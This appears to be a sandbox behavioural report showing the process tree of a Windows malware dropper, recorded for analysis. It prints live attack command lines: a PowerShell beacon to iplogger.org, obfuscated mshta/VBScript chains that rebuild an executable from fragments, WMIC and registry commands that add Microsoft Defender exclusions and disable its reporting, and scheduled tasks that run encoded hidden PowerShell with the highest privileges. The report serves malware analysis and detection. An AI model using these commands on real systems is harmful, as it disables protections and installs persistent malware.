C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02d385ff55.exeThu02d385ff55.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1260 -
C:\Users\Admin\Documents\3aKAj7M0ArmXRhDVn8m5SW6w.exe"C:\Users\Admin\Documents\3aKAj7M0ArmXRhDVn8m5SW6w.exe"2⤵PID:6028
-
-
C:\Users\Admin\Documents\ROALiWFsQQ6znKzS1XQ1Yxhu.exe"C:\Users\Admin\Documents\ROALiWFsQQ6znKzS1XQ1Yxhu.exe"2⤵
- Executes dropped EXE
PID:6040 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 2683⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1488
-
-
-
C:\Users\Admin\Documents\8Fb4EkT85lFegSzJ2GCDrw_Z.exe"C:\Users\Admin\Documents\8Fb4EkT85lFegSzJ2GCDrw_Z.exe"2⤵
- Executes dropped EXE
PID:5156
-
-
C:\Users\Admin\Documents\_Uqo5UP9ZDxv2KDF87j1qJ5Q.exe"C:\Users\Admin\Documents\_Uqo5UP9ZDxv2KDF87j1qJ5Q.exe"2⤵
- Executes dropped EXE
PID:4212 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 2683⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1280
-
-
-
C:\Users\Admin\Documents\CiDdAOtOAfGTjMtFrybZvGVz.exe"C:\Users\Admin\Documents\CiDdAOtOAfGTjMtFrybZvGVz.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4708
-
-
C:\Users\Admin\Documents\vefp3cTczsHP35rf3STZwLUJ.exe"C:\Users\Admin\Documents\vefp3cTczsHP35rf3STZwLUJ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6136
-
-
C:\Users\Admin\Documents\MRMOpxU_ONutwd6wjErAG8Yd.exe"C:\Users\Admin\Documents\MRMOpxU_ONutwd6wjErAG8Yd.exe"2⤵PID:6128
-
-
C:\Users\Admin\Documents\4UFxWlf4SXw8gZe000f3mxr3.exe"C:\Users\Admin\Documents\4UFxWlf4SXw8gZe000f3mxr3.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6120
-
-
C:\Users\Admin\Documents\W455uTSoUtq8LXiwXO1kYBjY.exe"C:\Users\Admin\Documents\W455uTSoUtq8LXiwXO1kYBjY.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6112 -
C:\Users\Admin\Documents\W455uTSoUtq8LXiwXO1kYBjY.exeC:\Users\Admin\Documents\W455uTSoUtq8LXiwXO1kYBjY.exe3⤵
- Executes dropped EXE
PID:6052
-
-
-
C:\Users\Admin\Documents\8Ax8th0v3UP0xwWMPp2QiY_N.exe"C:\Users\Admin\Documents\8Ax8th0v3UP0xwWMPp2QiY_N.exe"2⤵
- Executes dropped EXE
PID:6104 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 2683⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2028
-
-
-
C:\Users\Admin\Documents\rqsEP3YoLzx_NtJ6Aidq0odO.exe"C:\Users\Admin\Documents\rqsEP3YoLzx_NtJ6Aidq0odO.exe"2⤵PID:6096
-
-
C:\Users\Admin\Documents\YCX7g7FDRa0n1vrcJtVZ_H9d.exe"C:\Users\Admin\Documents\YCX7g7FDRa0n1vrcJtVZ_H9d.exe"2⤵
- Executes dropped EXE
PID:6088 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 2883⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4932
-
-
-
C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe"C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6080 -
C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exeC:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe3⤵
- Executes dropped EXE
PID:4688
-
-
C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exeC:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe3⤵PID:1248
-
-
C:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exeC:\Users\Admin\Documents\hDp_Q0M7VwC0FF7WWvUBtdbN.exe3⤵
- Executes dropped EXE
PID:3952
-
-
-
C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe"C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Users\Admin\AppData\Local\Temp\73bbf62d-bd71-48c9-ba6d-1d773363e140\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\73bbf62d-bd71-48c9-ba6d-1d773363e140\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\73bbf62d-bd71-48c9-ba6d-1d773363e140\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73bbf62d-bd71-48c9-ba6d-1d773363e140\test.bat"4⤵PID:5920
-
-
-
C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe"C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe"3⤵PID:6176
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe" -Force3⤵PID:6164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 23883⤵
- Program crash
PID:6624
-
-
-
C:\Users\Admin\Documents\aOiJ03mSE4lRy3Tw5uB0q43R.exe"C:\Users\Admin\Documents\aOiJ03mSE4lRy3Tw5uB0q43R.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4292 -
C:\Users\Admin\Documents\aOiJ03mSE4lRy3Tw5uB0q43R.exe"C:\Users\Admin\Documents\aOiJ03mSE4lRy3Tw5uB0q43R.exe"3⤵PID:5112
-
-
-
C:\Users\Admin\Documents\jDVhr13u5N750xam3eOI1eNW.exe"C:\Users\Admin\Documents\jDVhr13u5N750xam3eOI1eNW.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5048
-
-
C:\Users\Admin\Documents\aclfGgw26YHyfrb3n9JONFow.exe"C:\Users\Admin\Documents\aclfGgw26YHyfrb3n9JONFow.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4028 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "210921.exe" & start "" "269new.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"3⤵PID:3080
-
C:\Users\Admin\AppData\Local\Temp\210921.exe"210921.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5396
-
-
C:\Users\Admin\AppData\Local\Temp\269new.exe"269new.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6024
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
-
-
C:\Users\Admin\Documents\PGyDws9ux3Lc9PjIedgVt2AC.exe"C:\Users\Admin\Documents\PGyDws9ux3Lc9PjIedgVt2AC.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5544 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6780
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"3⤵
- Executes dropped EXE
PID:6772 -
C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe"C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe"4⤵PID:4268
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )5⤵PID:7148
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe" ) do taskkill -F -Im "%~nXU"6⤵PID:5568
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK7⤵PID:4448
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )8⤵PID:3644
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"9⤵PID:7084
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )8⤵PID:1244
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM9⤵PID:6168
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"10⤵PID:2460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "10⤵PID:3896
-
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM10⤵PID:1288
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM11⤵
- Loads dropped DLL
PID:2128 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM12⤵PID:2192
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM13⤵
- Loads dropped DLL
PID:4152
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "mdz2Qc8uAQmPH5Q51Ox0Lsha.exe"7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Kills process with taskkill
PID:6796
-
-
-
-
-
C:\Users\Admin\Documents\nfE_fUZjR5paPR7MbxI6KJrs.exe"C:\Users\Admin\Documents\nfE_fUZjR5paPR7MbxI6KJrs.exe"4⤵PID:3240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 17445⤵
- Program crash
- Enumerates system info in registry
PID:6360
-
-
-
C:\Users\Admin\Documents\OUuhUnNTGfrMVidogDjLBMaq.exe"C:\Users\Admin\Documents\OUuhUnNTGfrMVidogDjLBMaq.exe"4⤵PID:4076
-
C:\Users\Admin\AppData\Local\Temp\tmp7B8A_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp7B8A_tmp.exe"5⤵
- Suspicious use of SetThreadContext
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\tmp7B8A_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp7B8A_tmp.exe6⤵PID:6888
-
-
-
-
C:\Users\Admin\Documents\vsvchNX79eSDzY6jf6F89_MI.exe"C:\Users\Admin\Documents\vsvchNX79eSDzY6jf6F89_MI.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:6096 -
C:\Users\Admin\Documents\vsvchNX79eSDzY6jf6F89_MI.exe"C:\Users\Admin\Documents\vsvchNX79eSDzY6jf6F89_MI.exe"5⤵PID:6920
-
-
-
C:\Users\Admin\Documents\7ixm251g7LXOO6MxPCZytSeW.exe"C:\Users\Admin\Documents\7ixm251g7LXOO6MxPCZytSeW.exe" /mixtwo4⤵PID:1084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 2645⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3736
-
-
-
C:\Users\Admin\Documents\JIp6LHWayvf6eqcKiqEoX_B2.exe"C:\Users\Admin\Documents\JIp6LHWayvf6eqcKiqEoX_B2.exe"4⤵PID:5532
-
-
C:\Users\Admin\Documents\atehf_dX9HmosZlbwm9KoeTG.exe"C:\Users\Admin\Documents\atehf_dX9HmosZlbwm9KoeTG.exe"4⤵PID:4968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 2725⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5144
-
-
-
C:\Users\Admin\Documents\e18m_dzotOho9LFg_lZFdOTK.exe"C:\Users\Admin\Documents\e18m_dzotOho9LFg_lZFdOTK.exe"4⤵PID:1016
-
C:\Users\Admin\AppData\Local\Temp\7zS7418.tmp\Install.exe.\Install.exe5⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\7zS7F62.tmp\Install.exe.\Install.exe /S /site_id "668658"6⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:3900 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &7⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:6176 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"8⤵PID:7020
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:6328
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:4896
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:1648
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"8⤵PID:6316
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:6172
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:3772
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:7144
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"8⤵PID:6640
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:3668
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:6384
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:16212
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"8⤵PID:5912
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True9⤵PID:6616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:4420
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:4512
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:6196
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵PID:3948
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵PID:5236
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵PID:7112
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:6932
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:4268
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵PID:6124
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵PID:6884
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gyOKhjCNy" /SC once /ST 06:14:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:7056 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3644
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 13:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\NeIRTzU.exe\" uG /site_id 668658 /S" /V1 /F7⤵
- Creates scheduled task(s)
PID:6816
-
-
-
-
-
C:\Users\Admin\Documents\3_LT0gGnQ5FKIT2FlE0lBEkk.exe"C:\Users\Admin\Documents\3_LT0gGnQ5FKIT2FlE0lBEkk.exe" silent4⤵PID:2480
-
-
C:\Users\Admin\Documents\4azU_c07QucZGrH2hrEOw9YR.exe"C:\Users\Admin\Documents\4azU_c07QucZGrH2hrEOw9YR.exe"4⤵PID:5252
-
C:\Users\Admin\AppData\Local\Temp\is-B4TPO.tmp\4azU_c07QucZGrH2hrEOw9YR.tmp"C:\Users\Admin\AppData\Local\Temp\is-B4TPO.tmp\4azU_c07QucZGrH2hrEOw9YR.tmp" /SL5="$70218,506127,422400,C:\Users\Admin\Documents\4azU_c07QucZGrH2hrEOw9YR.exe"5⤵
- Loads dropped DLL
PID:5976 -
C:\Users\Admin\AppData\Local\Temp\is-IT2JP.tmp\Sharefolder.exe"C:\Users\Admin\AppData\Local\Temp\is-IT2JP.tmp\Sharefolder.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:1068 -
C:\Program Files\MSBuild\PJQXQGAGPE\foldershare.exe"C:\Program Files\MSBuild\PJQXQGAGPE\foldershare.exe" /VERYSILENT7⤵PID:6364
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 9768⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6960
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6364 -s 9888⤵
- Program crash
PID:5752
-
-
-
C:\Users\Admin\AppData\Local\Temp\8a-189b3-1b3-af1a1-c2e7664e0a9b6\Cohelesaecy.exe"C:\Users\Admin\AppData\Local\Temp\8a-189b3-1b3-af1a1-c2e7664e0a9b6\Cohelesaecy.exe"7⤵PID:2448
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e68⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:5324 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:4248
-
-
